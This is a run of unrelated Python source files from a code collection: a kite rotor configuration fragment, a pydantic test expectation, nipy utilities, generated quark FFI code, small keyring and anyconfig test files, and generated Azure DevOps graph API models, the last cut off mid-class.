propeller_versions[m.kMotorSto] = m.kPropVersionRev4PositiveX elif params['wing_serial'] == m.kWingSerial06Hover: propeller_versions[m.kMotorSbo] = m.kPropVersionRev4NegativeX propeller_versions[m.kMotorSbi] = m.kPropVersionRev4PositiveX propeller_versions[m.kMotorPbi] = m.kPropVersionRev4PositiveX propeller_versions[m.kMotorPbo] = m.kPropVersionRev4NegativeX propeller_versions[m.kMotorPto] = m.kPropVersionRev4PositiveX propeller_versions[m.kMotorPti] = m.kPropVersionRev1Trimmed propeller_versions[m.kMotorSti] = m.kPropVersionRev1Trimmed propeller_versions[m.kMotorSto] = m.kPropVersionRev4PositiveX elif params['wing_serial'] in [m.kWingSerial07Crosswind]: propeller_versions[m.kMotorSbo] = m.kPropVersionRev4NegativeX propeller_versions[m.kMotorSbi] = m.kPropVersionRev4PositiveX propeller_versions[m.kMotorPbi] = m.kPropVersionRev4PositiveX propeller_versions[m.kMotorPbo] = m.kPropVersionRev4NegativeX propeller_versions[m.kMotorPto] = m.kPropVersionRev4PositiveX propeller_versions[m.kMotorPti] = m.kPropVersionRev4NegativeX propeller_versions[m.kMotorSti] = m.kPropVersionRev4NegativeX propeller_versions[m.kMotorSto] = m.kPropVersionRev4PositiveX elif params['wing_serial'] == m.kWingSerial07Hover: propeller_versions[m.kMotorSbo] = m.kPropVersionRev4NegativeX propeller_versions[m.kMotorSbi] = m.kPropVersionRev4PositiveX propeller_versions[m.kMotorPbi] = m.kPropVersionRev4PositiveX propeller_versions[m.kMotorPbo] = m.kPropVersionRev4NegativeX propeller_versions[m.kMotorPto] = m.kPropVersionRev4PositiveX propeller_versions[m.kMotorPti] = m.kPropVersionRev1Trimmed propeller_versions[m.kMotorSti] = m.kPropVersionRev1Trimmed propeller_versions[m.kMotorSto] = m.kPropVersionRev4PositiveX else: assert False, 'Unknown wing serial.' rotors = [None for _ in range(m.kNumMotors)] for r in range(m.kNumMotors): rotors[r] = { # Normal vector to the propeller plane. 'axis': [np.cos(np.deg2rad(3.0)), 0.0, np.sin(np.deg2rad(3.0))], # Direction cosine matrix from body to rotor frame. 'dcm_b2r': {'d': [[np.cos(np.deg2rad(-3.0)), 0.0, np.sin(np.deg2rad(-3.0))], [0.0, 1.0, 0.0], [-np.sin(np.deg2rad(-3.0)), 0.0, np.cos(np.deg2rad(-3.0))]]}, # Local pressure coefficient [#] at the rotor position. The # pressure coefficient, C_P, is related to local airspeed # through the equation: # # C_P = 1 - (v / v_freestream)^2 # # There is a significant difference in airspeeds between the top # and bottom propellers caused by the lift of the wing. These # pressure coefficients are derived from CFD with the slatted # kite at 4 deg alpha (https://goo.gl/yfkJJS) 'local_pressure_coeff': 0.1448 if r in bottom_row else -0.1501, # The rotor direction, diameter [m] and moment of inertia [kg # m^2] are set from the corresponding propeller's information. 'version': propeller_versions[r], 'dir': params['propellers'][propeller_versions[r]]['dir'], 'D': params['propellers'][propeller_versions[r]]['D'], 'I': (yasa_rotor_moment_of_inertia + params['propellers'][propeller_versions[r]]['I']), } # We check that the rotor axis is normalized. because it is used # to determine the force-moment conversion matrix in # rotor_control.py. assert abs(np.linalg.norm(rotors[r]['axis']) - 1.0) < 1e-9 # Rotor positions [m]. # # Updated on 2015-01-22 based on the COM positions given by the Mass # and Balance spreadsheet. rotors[m.kMotorSbo]['pos'] = [1.613, 3.639, 1.597] rotors[m.kMotorSbi]['pos'] = [1.613, 1.213, 1.597] rotors[m.kMotorPbi]['pos'] = [1.613, -1.213, 1.597] rotors[m.kMotorPbo]['pos'] = [1.613, -3.639, 1.597] rotors[m.kMotorPto]['pos'] = [1.960, -3.639, -1.216] rotors[m.kMotorPti]['pos'] = [1.960, -1.213, -1.216] rotors[m.kMotorSti]['pos'] = [1.960, 1.213, -1.216] rotors[m.kMotorSto]['pos'] = [1.960, 3.639, -1.216] return rotors
tests/data/expected/parser/openapi/openapi_parser_parse_any/output.py
languitar/datamodel-code-generator
891
12634960
from __future__ import annotations from typing import Any, Optional from pydantic import BaseModel class Item(BaseModel): bar: Optional[Any] = None foo: str
nipy/utils/utilities.py
bpinsard/nipy
236
12634962
<reponame>bpinsard/nipy """ Collection of utility functions and classes Some of these come from the matplotlib ``cbook`` module with thanks. """ from functools import reduce from operator import mul def is_iterable(obj): """ Return True if `obj` is iterable """ try: iter(obj) except TypeError: return False return True def is_numlike(obj): """ Return True if `obj` looks like a number """ try: obj + 1 except: return False return True def seq_prod(seq, initial=1): """ General product of sequence elements Parameters ---------- seq : sequence Iterable of values to multiply. initial : object, optional Initial value Returns ------- prod : object Result of ``initial * seq[0] * seq[1] .. ``. """ return reduce(mul, seq, initial)
quarkc/test/ffi/expected/py/signatures/generics/pkg/__init__.py
datawire/quark
112
12634971
<filename>quarkc/test/ffi/expected/py/signatures/generics/pkg/__init__.py from __future__ import unicode_literals from __future__ import division from __future__ import absolute_import from __future__ import print_function from builtins import str as unicode from quark_runtime import * _lazyImport.plug("generics.pkg") import quark.reflect class Foo(object): def foo(self): return _cast(None, lambda: T) def get(self): raise NotImplementedError('`Foo.get` is an abstract method') Foo.generics_pkg_Foo_quark_Object__ref = None class StringFoo(_QObject): def _init(self): pass def __init__(self): self._init() def get(self): return _cast(None, lambda: unicode) def _getClass(self): return u"generics.pkg.StringFoo" def _getField(self, name): return None def _setField(self, name, value): pass def foo(self): return _cast(None, lambda: unicode) StringFoo.generics_pkg_StringFoo_ref = None class Box(_QObject): def _init(self): self.contents = None def __init__(self, contents): self._init() def _getClass(self): return u"generics.pkg.Box<quark.Object>" def _getField(self, name): if ((name) == (u"contents")): return (self).contents return None def _setField(self, name, value): if ((name) == (u"contents")): (self).contents = _cast(value, lambda: T) class StringBox(Box): def _init(self): Box._init(self) def __init__(self, contents): super(StringBox, self).__init__(contents); def _getClass(self): return u"generics.pkg.StringBox" def _getField(self, name): if ((name) == (u"contents")): return (self).contents return None def _setField(self, name, value): if ((name) == (u"contents")): (self).contents = _cast(value, lambda: unicode) StringBox.generics_pkg_Box_quark_String__ref = None StringBox.generics_pkg_StringBox_ref = None def _lazy_import_quark_ffi_signatures_md(): import quark_ffi_signatures_md globals().update(locals()) _lazyImport("import quark_ffi_signatures_md", _lazy_import_quark_ffi_signatures_md) _lazyImport.pump("generics.pkg")
tests/test_core.py
kianmeng/keyring
834
12634975
<reponame>kianmeng/keyring import keyring.core def test_init_recommended(monkeypatch): """ Test filtering of backends to recommended ones (#117, #423). """ monkeypatch.setattr(keyring.core, 'set_keyring', lambda kr: None) keyring.core.init_backend(keyring.core.recommended)
tests/base/__init__.py
ssato/python-anyconfig
213
12634987
<reponame>ssato/python-anyconfig # # Copyright (C) 2021 <NAME> <<EMAIL>> # SPDX-License-Identifier: MIT # r"""Common test Utility functions, constants and global variables, etc. """ from .constants import TESTS_DIR, RES_DIR, NULL_CNTNR from .collector import TDataCollector from .datatypes import TData from .utils import ( load_data, load_datasets_from_dir, maybe_data_path ) __all__ = [ 'TESTS_DIR', 'RES_DIR', 'NULL_CNTNR', 'TDataCollector', 'TData', 'load_data', 'load_datasets_from_dir', 'maybe_data_path' ] # vim:sw=4:ts=4:et:
azure-devops/azext_devops/devops_sdk/v5_1/graph/models.py
keithlemon/azure-devops-cli-extension
326
12635008
# -------------------------------------------------------------------------------------------- # Copyright (c) Microsoft Corporation. All rights reserved. # Licensed under the MIT License. See License.txt in the project root for license information. # -------------------------------------------------------------------------------------------- # Generated file, DO NOT EDIT # Changes may cause incorrect behavior and will be lost if the code is regenerated. # -------------------------------------------------------------------------------------------- from msrest.serialization import Model class Avatar(Model): """ :param is_auto_generated: :type is_auto_generated: bool :param size: :type size: object :param time_stamp: :type time_stamp: datetime :param value: :type value: str """ _attribute_map = { 'is_auto_generated': {'key': 'isAutoGenerated', 'type': 'bool'}, 'size': {'key': 'size', 'type': 'object'}, 'time_stamp': {'key': 'timeStamp', 'type': 'iso-8601'}, 'value': {'key': 'value', 'type': 'str'} } def __init__(self, is_auto_generated=None, size=None, time_stamp=None, value=None): super(Avatar, self).__init__() self.is_auto_generated = is_auto_generated self.size = size self.time_stamp = time_stamp self.value = value class GraphCachePolicies(Model): """ :param cache_size: Size of the cache :type cache_size: int """ _attribute_map = { 'cache_size': {'key': 'cacheSize', 'type': 'int'} } def __init__(self, cache_size=None): super(GraphCachePolicies, self).__init__() self.cache_size = cache_size class GraphDescriptorResult(Model): """ Subject descriptor of a Graph entity :param _links: This field contains zero or more interesting links about the graph descriptor. These links may be invoked to obtain additional relationships or more detailed information about this graph descriptor. :type _links: :class:`ReferenceLinks <azure.devops.v5_1.graph.models.ReferenceLinks>` :param value: :type value: :class:`str <azure.devops.v5_1.graph.models.str>` """ _attribute_map = { '_links': {'key': '_links', 'type': 'ReferenceLinks'}, 'value': {'key': 'value', 'type': 'str'} } def __init__(self, _links=None, value=None): super(GraphDescriptorResult, self).__init__() self._links = _links self.value = value class GraphFederatedProviderData(Model): """ Represents a set of data used to communicate with a federated provider on behalf of a particular user. :param access_token: The access token that can be used to communicated with the federated provider on behalf on the target identity, if we were able to successfully acquire one, otherwise <code>null</code>, if we were not. :type access_token: str :param provider_name: The name of the federated provider, e.g. "github.com". :type provider_name: str :param subject_descriptor: The descriptor of the graph subject to which this federated provider data corresponds. :type subject_descriptor: str :param version: The version number of this federated provider data, which corresponds to when it was last updated. Can be used to prevent returning stale provider data from the cache when the caller is aware of a newer version, such as to prevent local cache poisoning from a remote cache or store. This is the app layer equivalent of the data layer sequence ID. :type version: long """ _attribute_map = { 'access_token': {'key': 'accessToken', 'type': 'str'}, 'provider_name': {'key': 'providerName', 'type': 'str'}, 'subject_descriptor': {'key': 'subjectDescriptor', 'type': 'str'}, 'version': {'key': 'version', 'type': 'long'} } def __init__(self, access_token=None, provider_name=None, subject_descriptor=None, version=None): super(GraphFederatedProviderData, self).__init__() self.access_token = access_token self.provider_name = provider_name self.subject_descriptor = subject_descriptor self.version = version class GraphGroupCreationContext(Model): """ Do not attempt to use this type to create a new group. This type does not contain sufficient fields to create a new group. :param storage_key: Optional: If provided, we will use this identifier for the storage key of the created group :type storage_key: str """ _attribute_map = { 'storage_key': {'key': 'storageKey', 'type': 'str'} } def __init__(self, storage_key=None): super(GraphGroupCreationContext, self).__init__() self.storage_key = storage_key class GraphMembership(Model): """ Relationship between a container and a member :param _links: This field contains zero or more interesting links about the graph membership. These links may be invoked to obtain additional relationships or more detailed information about this graph membership. :type _links: :class:`ReferenceLinks <azure.devops.v5_1.graph.models.ReferenceLinks>` :param container_descriptor: :type container_descriptor: str :param member_descriptor: :type member_descriptor: str """ _attribute_map = { '_links': {'key': '_links', 'type': 'ReferenceLinks'}, 'container_descriptor': {'key': 'containerDescriptor', 'type': 'str'}, 'member_descriptor': {'key': 'memberDescriptor', 'type': 'str'} } def __init__(self, _links=None, container_descriptor=None, member_descriptor=None): super(GraphMembership, self).__init__() self._links = _links self.container_descriptor = container_descriptor self.member_descriptor = member_descriptor class GraphMembershipState(Model): """ Status of a Graph membership (active/inactive) :param _links: This field contains zero or more interesting links about the graph membership state. These links may be invoked to obtain additional relationships or more detailed information about this graph membership state. :type _links: :class:`ReferenceLinks <azure.devops.v5_1.graph.models.ReferenceLinks>` :param active: When true, the membership is active :type active: bool """ _attribute_map = { '_links': {'key': '_links', 'type': 'ReferenceLinks'}, 'active': {'key': 'active', 'type': 'bool'} } def __init__(self, _links=None, active=None): super(GraphMembershipState, self).__init__() self._links = _links self.active = active class GraphMembershipTraversal(Model): """ :param incompleteness_reason: Reason why the subject could not be traversed completely :type incompleteness_reason: str :param is_complete: When true, the subject is traversed completely :type is_complete: bool :param subject_descriptor: The traversed subject descriptor :type subject_descriptor: :class:`str <azure.devops.v5_1.graph.models.str>` :param traversed_subject_ids: Subject descriptor ids of the traversed members :type traversed_subject_ids: list of str :param traversed_subjects: Subject descriptors of the traversed members :type traversed_subjects: list of :class:`str <azure.devops.v5_1.graph.models.str>` """ _attribute_map = { 'incompleteness_reason': {'key': 'incompletenessReason', 'type': 'str'}, 'is_complete': {'key': 'isComplete', 'type': 'bool'}, 'subject_descriptor': {'key': 'subjectDescriptor', 'type': 'str'}, 'traversed_subject_ids': {'key': 'traversedSubjectIds', 'type': '[str]'}, 'traversed_subjects': {'key': 'traversedSubjects', 'type': '[str]'} } def __init__(self, incompleteness_reason=None, is_complete=None, subject_descriptor=None, traversed_subject_ids=None, traversed_subjects=None): super(GraphMembershipTraversal, self).__init__() self.incompleteness_reason = incompleteness_reason self.is_complete = is_complete self.subject_descriptor = subject_descriptor self.traversed_subject_ids = traversed_subject_ids self.traversed_subjects = traversed_subjects class GraphProviderInfo(Model): """ Who is the provider for this user and what is the identifier and domain that is used to uniquely identify the user. :param descriptor: The descriptor is the primary way to reference the graph subject while the system is running. This field will uniquely identify the same graph subject across both Accounts and Organizations. :type descriptor: str :param domain: This represents the name of the container of origin for a graph member. (For MSA this is "Windows Live ID", for AAD the tenantID of the directory.) :type domain: str :param origin: The type of source provider for the origin identifier (ex: "aad", "msa") :type origin: str :param origin_id: The unique identifier from the system of origin. (For MSA this is the PUID in hex notation, for AAD this is the object id.) :type origin_id: str """ _attribute_map = { 'descriptor': {'key': 'descriptor', 'type': 'str'}, 'domain': {'key': 'domain', 'type': 'str'}, 'origin': {'key': 'origin', 'type': 'str'}, 'origin_id': {'key': 'originId', 'type': 'str'} } def __init__(self, descriptor=None, domain=None, origin=None, origin_id=None): super(GraphProviderInfo, self).__init__() self.descriptor = descriptor self.domain = domain self.origin = origin self.origin_id = origin_id class GraphScopeCreationContext(Model): """ This type is the subset of fields that can be provided by the user to create a Vsts scope. Scope creation is currently limited to internal back-compat scenarios. End users that attempt to create a scope with this API will fail. :param admin_group_description: Set this field to override the default description of this scope's admin group. :type admin_group_description: str :param admin_group_name: All scopes have an Administrator Group that controls access to the contents of the scope. Set this field to use a non-default group name for that administrators group. :type admin_group_name: str :param creator_id: Set this optional field if this scope is created on behalf of a user other than the user making the request. This should be the Id of the user that is not the requester. :type creator_id: str :param name: The scope must be provided with a unique name within the parent scope. This means the created scope can have a parent or child with the same name, but no siblings with the same name. :type name: str :param scope_type: The type of scope being created. :type scope_type: object :param storage_key: An optional ID that uniquely represents the scope within it's parent scope. If this parameter is not provided, Vsts will generate on automatically. :type storage_key: str """ _attribute_map = { 'admin_group_description': {'key': 'adminGroupDescription', 'type': 'str'}, 'admin_group_name': {'key': 'adminGroupName', 'type': 'str'}, 'creator_id': {'key': 'creatorId', 'type': 'str'}, 'name': {'key': 'name', 'type': 'str'}, 'scope_type': {'key': 'scopeType', 'type': 'object'}, 'storage_key': {'key': 'storageKey', 'type': 'str'} } def __init__(self, admin_group_description=None, admin_group_name=None, creator_id=None, name=None, scope_type=None, storage_key=None): super(GraphScopeCreationContext, self).__init__() self.admin_group_description = admin_group_description self.admin_group_name = admin_group_name self.creator_id = creator_id self.name = name self.scope_type = scope_type self.storage_key = storage_key class GraphStorageKeyResult(Model): """ Storage key of a Graph entity :param _links: This field contains zero or more interesting links about the graph storage key. These links may be invoked to obtain additional relationships or more detailed information about this graph storage key. :type _links: :class:`ReferenceLinks <azure.devops.v5_1.graph.models.ReferenceLinks>` :param value: :type value: str """ _attribute_map = { '_links': {'key': '_links', 'type': 'ReferenceLinks'}, 'value': {'key': 'value', 'type': 'str'} } def __init__(self, _links=None, value=None): super(GraphStorageKeyResult, self).__init__() self._links = _links self.value = value class GraphSubjectBase(Model): """ :param _links: This field contains zero or more interesting links about the graph subject. These links may be invoked to obtain additional relationships or more detailed information about this graph subject. :type _links: :class:`ReferenceLinks <azure.devops.v5_1.graph.models.ReferenceLinks>` :param descriptor: The descriptor is the primary way to reference the graph subject while the system is running. This field will uniquely identify the same graph subject across both Accounts and Organizations. :type descriptor: str :param display_name: This is the non-unique display name of the graph subject. To change this field, you must alter its value in the source provider. :type display_name: str :param url: This url is the full route to the source resource of this graph subject. :type url: str """ _attribute_map = { '_links': {'key': '_links', 'type': 'ReferenceLinks'}, 'descriptor': {'key': 'descriptor', 'type': 'str'}, 'display_name': {'key': 'displayName', 'type': 'str'}, 'url': {'key': 'url', 'type': 'str'} } def __init__(self, _links=None, descriptor=None, display_name=None, url=None): super(GraphSubjectBase, self).__init__() self._links = _links self.descriptor = descriptor self.display_name = display_name self.url = url class GraphSubjectLookup(Model): """ Batching of subjects to lookup using the Graph API :param lookup_keys: :type lookup_keys: list of :class:`GraphSubjectLookupKey <azure.devops.v5_1.graph.models.GraphSubjectLookupKey>` """ _attribute_map = { 'lookup_keys': {'key': 'lookupKeys', 'type': '[GraphSubjectLookupKey]'} } def __init__(self, lookup_keys=None): super(GraphSubjectLookup, self).__init__() self.lookup_keys = lookup_keys class GraphSubjectLookupKey(Model): """ :param descriptor: :type descriptor: :class:`str <azure.devops.v5_1.graph.models.str>` """ _attribute_map = { 'descriptor': {'key': 'descriptor', 'type': 'str'} } def __init__(self, descriptor=None): super(GraphSubjectLookupKey, self).__init__() self.descriptor = descriptor class GraphUserCreationContext(Model): """ Do not attempt to use this type to create a new user. Use one of the subclasses instead. This type does not contain sufficient fields to create a new user. :param storage_key: Optional: If provided, we will use this identifier for the storage key of the created user :type storage_key: str """ _attribute_map = { 'storage_key': {'key': 'storageKey', 'type': 'str'} } def __init__(self, storage_key=None): super(GraphUserCreationContext, self).__init__() self.storage_key = storage_key class GraphUserUpdateContext(Model): """ Do not attempt to use this type to update user. Use one of the subclasses instead. This type does not contain sufficient fields to create a new user. :param storage_key: Storage key should not be specified in case of updating user :type storage_key: str """ _attribute_map = { 'storage_key': {'key': 'storageKey', 'type': 'str'} } def __init__(self, storage_key=None): super(GraphUserUpdateContext, self).__init__() self.storage_key = storage_key class JsonPatchOperation(Model): """ The JSON model for a JSON Patch operation :param from_: The path to copy from for the Move/Copy operation. :type from_: str :param op: The patch operation :type op: object :param path: The path for the operation. In the case of an array, a zero based index can be used to specify the position in the array (e.g. /biscuits/0/name). The "-" character can be used instead of an index to insert at the end of the array (e.g. /biscuits/-). :type path: str :param value: The value for the operation. This is either a primitive or a JToken. :type value: object """ _attribute_map = { 'from_': {'key': 'from', 'type': 'str'}, 'op': {'key': 'op', 'type': 'object'}, 'path': {'key': 'path', 'type': 'str'}, 'value': {'key': 'value', 'type': 'object'} } def __init__(self, from_=None, op=None, path=None, value=None): super(JsonPatchOperation, self).__init__() self.from_ = from_ self.op = op self.path = path self.value = value class PagedGraphGroups(Model): """ :param continuation_token: This will be non-null if there is another page of data. There will never be more than one continuation token returned by a request. :type continuation_token: list of str :param graph_groups: The enumerable list of groups found within a page. :type graph_groups: list of :class:`GraphGroup <azure.devops.v5_1.graph.models.GraphGroup>` """ _attribute_map = { 'continuation_token': {'key': 'continuationToken', 'type': '[str]'}, 'graph_groups': {'key': 'graphGroups', 'type': '[GraphGroup]'} } def __init__(self, continuation_token=None, graph_groups=None): super(PagedGraphGroups, self).__init__() self.continuation_token = continuation_token self.graph_groups = graph_groups class PagedGraphUsers(Model): """ :param continuation_token: This will be non-null if there is another page of data. There will never be more than one continuation token returned by a request. :type continuation_token: list of str :param graph_users: The enumerable set of users found within a page. :type graph_users: list of :class:`GraphUser <azure.devops.v5_1.graph.models.GraphUser>` """ _attribute_map = { 'continuation_token': {'key': 'continuationToken', 'type': '[str]'}, 'graph_users': {'key': 'graphUsers', 'type': '[GraphUser]'} } def __init__(self, continuation_token=None, graph_users=None): super(PagedGraphUsers, self).__init__() self.continuation_token = continuation_token self.graph_users = graph_users class ReferenceLinks(Model): """ The class to represent a collection of REST reference links. :param links: The readonly view of the links. Because Reference links are readonly, we only want to expose them as read only. :type links: dict """ _attribute_map = { 'links': {'key': 'links', 'type': '{object}'} } def __init__(self, links=None): super(ReferenceLinks, self).__init__() self.links = links class GraphSubject(GraphSubjectBase): """ Top-level graph entity :param _links: This field contains zero or more interesting links about the graph subject. These links may be invoked to obtain additional relationships or more detailed information about this graph subject. :type _links: :class:`ReferenceLinks <azure.devops.v5_1.graph.models.ReferenceLinks>` :param descriptor: The descriptor is the primary way to reference the graph subject while the system is running. This field will uniquely identify the same graph subject across both Accounts and Organizations. :type descriptor: str :param display_name: This is the non-unique display name of the graph subject. To change this field, you must alter its value in the source provider. :type display_name: str :param url: This url is the full route to the source resource of this graph subject. :type url: str :param legacy_descriptor: [Internal Use Only] The legacy descriptor is here in case you need to access old version IMS using identity descriptor. :type legacy_descriptor: str :param origin: The type of source provider for the origin identifier (ex:AD, AAD, MSA) :type origin: str :param origin_id: The unique identifier from the system of origin. Typically a sid, object id or Guid. Linking and unlinking operations can cause this value to change for a user because the user is not backed by a different provider and has a different unique id in the new provider. :type origin_id: str :param subject_kind: This field identifies the type of the graph subject (ex: Group, Scope, User). :type subject_kind: str """ _attribute_map = { '_links': {'key': '_links', 'type': 'ReferenceLinks'}, 'descriptor': {'key': 'descriptor', 'type': 'str'}, 'display_name': {'key': 'displayName', 'type': 'str'}, 'url': {'key': 'url', 'type': 'str'}, 'legacy_descriptor': {'key': 'legacyDescriptor', 'type': 'str'}, 'origin': {'key': 'origin', 'type': 'str'}, 'origin_id': {'key': 'originId', 'type': 'str'}, 'subject_kind': {'key': 'subjectKind', 'type': 'str'} } def __init__(self, _links=None, descriptor=None, display_name=None, url=None, legacy_descriptor=None, origin=None, origin_id=None, subject_kind=None): super(GraphSubject, self).__init__(_links=_links, descriptor=descriptor, display_name=display_name, url=url) self.legacy_descriptor = legacy_descriptor self.origin = origin self.origin_id = origin_id self.subject_kind = subject_kind class GraphMember(GraphSubject): """ :param _links: This field contains zero or more interesting links about the graph subject. These links may be invoked to obtain additional relationships or more detailed information about this graph subject. :type _links: :class:`ReferenceLinks <azure.devops.v5_1.graph.models.ReferenceLinks>` :param descriptor: The descriptor is the primary way to reference the graph subject while the system is running. This field will uniquely identify the same graph subject across both Accounts and Organizations. :type descriptor: str :param display_name: This is the non-unique display name of the graph subject. To change this field, you must alter its value in the source provider. :type display_name: str :param url: This url is the full route to the source resource of this graph subject. :type url: str :param legacy_descriptor: [Internal Use Only] The legacy descriptor is here in case you need to access old version IMS using identity descriptor. :type legacy_descriptor: str :param origin: The type of source provider for the origin identifier (ex:AD, AAD, MSA) :type origin: str :param origin_id: The unique identifier from the system of origin. Typically a sid, object id or Guid. Linking and unlinking operations can cause this value to change for a user because the user is not backed by a different provider and has a different unique id in the new provider. :type origin_id: str :param subject_kind: This field identifies the type of the graph subject (ex: Group, Scope, User). :type subject_kind: str :param domain: This represents the name of the container of origin for a graph member. (For MSA this is "Windows Live ID", for AD the name of the domain, for AAD the tenantID of the directory, for VSTS groups the ScopeId, etc) :type domain: str :param mail_address: The email address of record for a given graph member. This may be different than the principal name. :type mail_address: str :param principal_name: This is the PrincipalName of this graph member from the source provider. The source provider may change this field over time and it is not guaranteed to be immutable for the life of the graph member by VSTS. :type principal_name: str """ _attribute_map = { '_links': {'key': '_links', 'type': 'ReferenceLinks'}, 'descriptor': {'key': 'descriptor', 'type': 'str'}, 'display_name': {'key': 'displayName', 'type': 'str'}, 'url': {'key': 'url', 'type': 'str'}, 'legacy_descriptor': {'key': 'legacyDescriptor', 'type': 'str'}, 'origin': {'key': 'origin', 'type': 'str'}, 'origin_id': {'key': 'originId', 'type': 'str'}, 'subject_kind': {'key': 'subjectKind', 'type': 'str'}, 'domain': {'key': 'domain', 'type': 'str'}, 'mail_address': {'key': 'mailAddress', 'type': 'str'}, 'principal_name': {'key': 'principalName', 'type': 'str'} } def __init__(self, _links=None, descriptor=None, display_name=None, url=None, legacy_descriptor=None, origin=None, origin_id=None, subject_kind=None, domain=None, mail_address=None, principal_name=None): super(GraphMember, self).__init__(_links=_links, descriptor=descriptor, display_name=display_name, url=url, legacy_descriptor=legacy_descriptor, origin=origin, origin_id=origin_id, subject_kind=subject_kind) self.domain = domain self.mail_address = mail_address self.principal_name = principal_name class GraphScope(GraphSubject): """ Container where a graph entity is defined (organization, project, team) :param _links: This field contains zero or more interesting links about the graph subject. These links may be invoked to obtain additional relationships or more detailed information about this graph subject. :type _links: :class:`ReferenceLinks <azure.devops.v5_1.graph.models.ReferenceLinks>` :param descriptor: The descriptor is the primary way to reference the graph subject while the system is running. This field will uniquely identify the same graph subject across both Accounts and Organizations. :type descriptor: str :param display_name: This is the non-unique display name of the graph subject. To change this field, you must alter its value in the source provider. :type display_name: str :param url: This url is the full route to the source resource of this graph subject. :type url: str :param legacy_descriptor: [Internal Use Only] The legacy descriptor is here in case you need to access old version IMS using identity descriptor. :type legacy_descriptor: str :param origin: The type of source provider for the origin identifier (ex:AD, AAD, MSA) :type origin: str :param origin_id: The unique identifier from the system of origin. Typically a sid, object id or Guid. Linking and unlinking operations can cause this value to change for a user because the user is not backed by a different provider and has a different unique id in the new provider. :type origin_id: str :param subject_kind: This field identifies the type of the graph subject (ex: Group, Scope, User). :type subject_kind: str :param administrator_descriptor: The subject descriptor that references the administrators group for this scope. Only members of this group can change the contents of this scope or assign other users permissions to access this scope. :type administrator_descriptor: str :param is_global: When true, this scope is also a securing host for one or more scopes. :type is_global: bool :param parent_descriptor: The subject descriptor for the closest account or organization in the ancestor tree of this scope. :type parent_descriptor: str :param scope_type: The type of this scope. Typically ServiceHost or TeamProject. :type scope_type: object :param securing_host_descriptor: The subject descriptor for the containing organization in the ancestor tree of this scope. :type securing_host_descriptor: str """ _attribute_map = { '_links': {'key': '_links', 'type': 'ReferenceLinks'}, 'descriptor': {'key': 'descriptor', 'type': 'str'}, 'display_name': {'key': 'displayName', 'type': 'str'}, 'url': {'key': 'url', 'type': 'str'}, 'legacy_descriptor': {'key': 'legacyDescriptor', 'type': 'str'}, 'origin': {'key': 'origin', 'type': 'str'}, 'origin_id': {'key': 'originId', 'type': 'str'}, 'subject_kind': {'key': 'subjectKind', 'type': 'str'}, 'administrator_descriptor': {'key': 'administratorDescriptor', 'type': 'str'}, 'is_global': {'key': 'isGlobal', 'type': 'bool'}, 'parent_descriptor': {'key': 'parentDescriptor', 'type': 'str'}, 'scope_type': {'key': 'scopeType', 'type': 'object'}, 'securing_host_descriptor': {'key': 'securingHostDescriptor', 'type': 'str'} } def __init__(self, _links=None, descriptor=None, display_name=None, url=None, legacy_descriptor=None, origin=None, origin_id=None, subject_kind=None, administrator_descriptor=None, is_global=None, parent_descriptor=None, scope_type=None, securing_host_descriptor=None): super(GraphScope, self).__init__(_links=_links, descriptor=descriptor, display_name=display_name, url=url, legacy_descriptor=legacy_descriptor, origin=origin, origin_id=origin_id, subject_kind=subject_kind) self.administrator_descriptor = administrator_descriptor self.is_global = is_global self.parent_descriptor = parent_descriptor self.scope_type = scope_type self.securing_host_descriptor = securing_host_descriptor class GraphUser(GraphMember): """ Graph user entity :param _links: This field contains zero or more interesting links about the graph subject. These links may be invoked to obtain additional relationships or more detailed information about this graph subject. :type _links: :class:`ReferenceLinks <azure.devops.v5_1.graph.models.ReferenceLinks>` :param descriptor: The descriptor is the primary way to reference the graph subject while the system is running. This field will uniquely identify the same graph subject across both Accounts and Organizations. :type descriptor: str :param display_name: This is the non-unique display name of the graph subject. To change this field, you must alter its value in the source provider. :type display_name: str :param url: This url is the full route to the source resource of this graph subject. :type url: str :param legacy_descriptor: [Internal Use Only] The legacy descriptor is here in case you need to access old version IMS using identity descriptor. :type legacy_descriptor: str :param origin: The type of source provider for the origin identifier (ex:AD, AAD, MSA) :type origin: str :param origin_id: The unique identifier from the system of origin. Typically a sid, object id or Guid. Linking and unlinking operations can cause this value to change for a user because the user is not backed by a different provider and has a different unique id in the new provider. :type origin_id: str :param subject_kind: This field identifies the type of the graph subject (ex: Group, Scope, User). :type subject_kind: str :param domain: This represents the name of the container of origin for a graph member. (For MSA this is "Windows Live ID", for AD the name of the domain, for AAD the tenantID of the directory, for VSTS groups the ScopeId, etc) :type domain: str :param mail_address: The email address of record for a given graph member. This may be different than the principal name. :type mail_address: str :param principal_name: This is the PrincipalName of this graph member from the source provider. The source provider may change this field over time and it is not guaranteed to be immutable for the life of the graph member by VSTS. :type principal_name: str :param directory_alias: The short, generally unique name for the user in the backing directory. For AAD users, this corresponds to the mail nickname, which is often but not necessarily similar to the part of the user's mail address before the @ sign. For GitHub users, this corresponds to the GitHub user handle. :type directory_alias: str :param is_deleted_in_origin: When true, the group has been deleted in the identity provider :type is_deleted_in_origin: bool :param metadata_update_date: :type metadata_update_date: datetime :param meta_type: The meta type of the user in the origin, such as "member", "guest", etc. See UserMetaType for the set of possible values. :type meta_type: str """ _attribute_map = { '_links': {'key': '_links', 'type': 'ReferenceLinks'}, 'descriptor': {'key': 'descriptor', 'type': 'str'}, 'display_name': {'key': 'displayName', 'type': 'str'}, 'url': {'key': 'url', 'type': 'str'}, 'legacy_descriptor': {'key': 'legacyDescriptor', 'type': 'str'}, 'origin': {'key': 'origin', 'type': 'str'}, 'origin_id': {'key': 'originId', 'type': 'str'}, 'subject_kind': {'key': 'subjectKind', 'type': 'str'}, 'domain': {'key': 'domain', 'type': 'str'}, 'mail_address': {'key': 'mailAddress', 'type': 'str'}, 'principal_name': {'key': 'principalName', 'type': 'str'}, 'directory_alias': {'key': 'directoryAlias', 'type': 'str'}, 'is_deleted_in_origin': {'key': 'isDeletedInOrigin', 'type': 'bool'}, 'metadata_update_date': {'key': 'metadataUpdateDate', 'type': 'iso-8601'}, 'meta_type': {'key': 'metaType', 'type': 'str'} } def __init__(self, _links=None, descriptor=None, display_name=None, url=None, legacy_descriptor=None, origin=None, origin_id=None, subject_kind=None, domain=None, mail_address=None, principal_name=None, directory_alias=None, is_deleted_in_origin=None, metadata_update_date=None, meta_type=None): super(GraphUser, self).__init__(_links=_links, descriptor=descriptor, display_name=display_name, url=url, legacy_descriptor=legacy_descriptor, origin=origin, origin_id=origin_id, subject_kind=subject_kind, domain=domain, mail_address=mail_address, 